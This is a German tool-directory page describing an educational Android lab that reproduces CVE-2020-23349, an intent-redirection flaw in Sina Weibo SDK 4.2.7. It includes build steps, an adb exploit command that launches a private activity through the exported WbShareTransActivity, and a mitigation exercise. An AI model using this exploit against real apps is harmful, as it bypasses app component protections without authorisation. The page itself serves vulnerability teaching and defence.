Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-23349_Lab — Pädagogisches Android-Labor für CVE-2020-23349 in Sina Weibo SDK 4.2.7 | Kitploit
Tools/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Android-SicherheitSchwachstellenanalyseExploitationMobile App-PenetrationstestsMobile SicherheitLernen & BildungLabs & Praxis
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

Pädagogisches Android-Labor für CVE-2020-23349 in Sina Weibo SDK 4.2.7

Repository anzeigen
9vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-23349 Android Lab

Ein Lehrprojekt zur lokalen Reproduktion der Intent-Redirection-Schwachstelle im Sina-Weibo-Android-SDK 4.2.7.

Nur auf autorisierten Testgeräten oder Emulatoren verwenden. Nicht gegen echte Benutzer-Apps einsetzen.

Komponenten

  • victim: Die verwundbare App mit dem eigentlichen openDefault-4.2.7.aar
  • attacker: Die Angreifer-App, die die exportierte WbShareTransActivity aufruft
  • victim/.../PrivateActivity: Das Ziel der Reproduktion mit android:exported="false"

Der verwundbare Ablauf ist wie folgt:

root@kitploit:~
Attacker 앱
  -> exported WbShareTransActivity
  -> Intent Extra의 startActivity/gotoActivity
  -> victim의 PrivateActivity 실행

Build

Android SDK 36 und JDK 17 sind erforderlich.

root@kitploit:~
./gradlew clean assembleDebug

Erzeugte Dateien:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

Installation und Reproduktion

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. Führen Sie bei Bedarf die Victim-App einmal aus.
  2. Drücken Sie in der Attacker-App die Schaltfläche Launch private Activity.
  3. Wenn der Bildschirm EXPLOIT SUCCESS erscheint, war die Reproduktion erfolgreich.

Sie können die Reproduktion auch direkt per ADB durchführen.

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

Warum funktioniert das?

Das SDK 4.2.7 vertraut den startActivity- und gotoActivity-Zeichenketten im externen Intent und verwendet sie wie folgt:

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

Da this der Context der Victim-App ist, behandelt Android dies so, als ob die Victim-App ihre eigene private Activity ausführt.

Da moderne Android-Builds eine explizite Angabe von android:exported erfordern, hat dieses Projekt in der Datei victim/AndroidManifest.xml explizit true gesetzt, um den impliziten exported-Zustand der früheren SDKs zu reproduzieren.

Mitigation-Übung

Setzen Sie in Übungen ohne Freigabefunktionen den folgenden Wert auf false und bauen Sie erneut.

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

Wenn Sie anschließend denselben Angriff ausführen, wird er durch eine SecurityException blockiert. In realen Produkten sollte das Weibo SDK 4.x entfernt und auf die neueste Wartungsversion aktualisiert werden.

SDK-Quelle

Das enthaltene AAR stammt aus dem 4.2.7-Commit des offiziellen öffentlichen Sina-Weibo-Repositorys.

  • Repository: https://github.com/sinaweibosdk/weibo_android_sdk
  • Commit: 99daf8a (4.2.7)
  • Datei: 新文档/openDefault-4.2.7.aar
Tool herunterladen